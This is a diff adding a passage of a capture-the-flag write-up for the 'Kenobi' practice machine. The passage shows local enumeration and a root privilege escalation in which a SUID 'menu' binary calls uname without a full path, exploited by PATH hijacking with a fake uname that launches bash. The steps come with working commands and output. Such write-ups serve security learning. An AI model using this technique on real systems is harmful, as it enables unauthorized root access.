content/post/kenobi-boot2-root-writeup.md

```diff
@@ -0,0 +1,268 @@
+Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)
+
+ * Documentation:  https://help.ubuntu.com
+ * Management:     https://landscape.canonical.com
+ * Support:        https://ubuntu.com/advantage
+
+103 packages can be updated.
+65 updates are security updates.
+
+
+Last login: Wed Sep  4 07:10:15 2019 from 192.168.1.147
+To run a command as administrator (user "root"), use "sudo <command>".
+See "man sudo_root" for details.
+
+kenobi@kenobi:~$
+```
+
+Success! I had a local account on the host!
+
+#### Escalating privileges
+I began to poke around on the host and managed to find a flag `user.txt` sitting right in kenobi's home directory. I ran through my usual CTF local enumeration steps including checking the host version, checking for sudo privs, etc... when I noticed a binary I wasn't familiar when checking for files with SUID bits. I've truncated the output a bit for clarity.
+
+```
+kenobi@kenobi:~$ find / -perm -4000 -type f 2>/dev/null
+/sbin/mount.nfs
+...
+/usr/bin/menu
+...
+/bin/ping6
+```
+
+Running this `menu` command prompted for an option and output a status check of the site, network configuration information or the kernel version. I then fed the command through strings to validate that it was shelling out to another command and was pleased to see it called out to both `curl` and `uname`.
+
+```
+kenobi@kenobi:~$ /usr/bin/menu
+
+***************************************
+1. status check
+2. kernel version
+3. ifconfig
+** Enter your choice :2
+4.8.0-58-generic
+kenobi@kenobi:~$ strings /usr/bin/menu | egrep 'curl|uname|ifconifg'
+curl -I localhost
+uname -r
+```
+
+With this information I decided to try a PATH hijacking attack by creating an executable binary in the kenobi user's local path containing a call to bash. I then overrode the kenobi user's local path to check this local path first and attempted to rerun the kernel version `menu` check again.
+
+```
+kenobi@kenobi:~$ mkdir bin
+kenobi@kenobi:~$ echo '/bin/bash' > bin/uname
+kenobi@kenobi:~$ chmod +x bin/uname 
+kenobi@kenobi:~$ export PATH=~/bin/:$PATH
+kenobi@kenobi:~$ /usr/bin/menu
+
+***************************************
+1. status check
+2. kernel version
+3. ifconfig
+** Enter your choice :2
+To run a command as administrator (user "root"), use "sudo <command>".
+See "man sudo_root" for details.
+
+root@kenobi:~# 
+```
+
+Success! This elevated me to root permissions and quickly I found the last flag sitting in the `/root/` directory.
+
+```
+root@kenobi:/# cd /root/
+root@kenobi:/root# ls
+root.txt
+```
+
+## Summary
+This attack ended up reinforcing how much care needs to be taken when reading through any information found. There were mountains of information made available in scans and files laying around that, if they weren't reiterated as often as they were, could have easily been missed. A perfect example of this is my entirely missing the NFS server listening on port 111, that I didn't catch until a second pass through on this host.
```

Comment:
This attack reinforced how much discipline is necessary when reading through exfiltrated information.

A perfect example of this is how I missed the NFS server listening on port 111, which I only found on my second pass through the host.